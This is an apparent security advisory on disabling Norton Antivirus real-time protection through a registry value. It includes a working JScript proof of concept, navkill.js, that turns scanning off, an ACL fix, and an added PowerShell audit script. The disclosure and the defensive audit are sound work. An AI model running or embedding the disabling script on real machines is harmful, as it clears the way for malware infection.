Norton Antivirus includes real-time protection that scans files. This protection can be manually deactivated by right-clicking the Norton icon in the system tray and selecting the "deactivate" option.
Running applications, such as application installers, can deactivate this option, install and execute a virus, and reactivate the scanner after installing.
Whether real-time protection is active is simply stored in the registry, like other interesting keys for antivirus scanning options.
This allows virus and Trojan programs that are able to avoid initial detection to disable the antivirus prior to self-extracting and infecting the computer.
Credit:
The information has been provided by Daniel Wischnewski.
The registry key HKEY_LOCAL_MACHINE\SOFTWARE\INTEL\LANDesk\VirusProtect6\CurrentVersion\Storages\Filesystem\RealTimeScan controls whether real-time protection is enabled.
A malicious program could control the real-time protection by simply changing this registry key. A sample program to deactivate the real-time protection is shown here:
<---==============================--- navkill.js ---==============================--->
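// Windows Script Host shell object, which exposes registry read/write methods
var WSHShell = WScript.CreateObject("WScript.Shell");
// Set the OnOff value under the RealTimeScan key to 0 (real-time protection off)
WSHShell.RegWrite("HKLM\\SOFTWARE\\INTEL\\LANDesk\\VirusProtect6\\CurrentVersion\\Storages\\Filesystem\\RealTimeScan\\OnOff", 0, "REG_DWORD");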
<---==============================--- navkill.js ---==============================--->
Solution:
Windows NT and 2000 users can deny access to the mentioned registry key using the registry's ACL.
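
To check whether the ACL on that key actually restricts writes, the following PowerShell audit is an added example (not part of the original advisory or the vendor's tooling). It reports the current OnOff value and lists any principal outside a trusted set that holds a write-type right on the key; the function name and the trusted list (English account names) are assumptions to adapt.

```powershell
# Added example, not from the advisory: audit the key the advisory names.
$KeyPath = 'HKLM:\SOFTWARE\INTEL\LANDesk\VirusProtect6\CurrentVersion\Storages\Filesystem\RealTimeScan'

# Rights that allow changing the OnOff value, or re-ACLing the key to gain that right.
$WriteRights = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership'

# Assumption: only these principals should be able to modify the key
# (names as shown on an English-language system).
$Trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')

# Hypothetical helper name; returns one object describing the key's state.
function Get-RealTimeScanAudit {
    param(
        [string]   $Path    = $KeyPath,
        [string[]] $Allowed = $Trusted
    )

    if (-not (Test-Path -LiteralPath $Path)) {
        Write-Warning "Key not found: $Path"
        return
    }

    # The advisory's sample script writes 0 to OnOff to switch real-time scanning off.
    $onOff = (Get-ItemProperty -LiteralPath $Path).OnOff

    # Allow entries that apply to this key itself and grant a write-type right
    # to a principal outside the trusted list.
    $writers = @((Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.PropagationFlags -notmatch 'InheritOnly' -and
        ([int]$_.RegistryRights -band [int]$WriteRights) -ne 0 -and
        $Allowed -notcontains $_.IdentityReference.Value
    })

    [pscustomobject]@{
        Path             = $Path
        OnOff            = $onOff
        ScanningDisabled = ($onOff -eq 0)
        UntrustedWriters = @($writers | ForEach-Object { "$($_.IdentityReference) [$($_.RegistryRights)]" })
    }
}

$result = Get-RealTimeScanAudit
if ($result) {
    $result | Format-List
    if ($result.ScanningDisabled -or $result.UntrustedWriters.Count -gt 0) {
        Write-Warning 'Real-time scan setting is off or writable by principals outside the trusted list.'
    }
}
```

An empty UntrustedWriters list means only the trusted principals can change the value; any other entry is a candidate for the ACL restriction described in the solution.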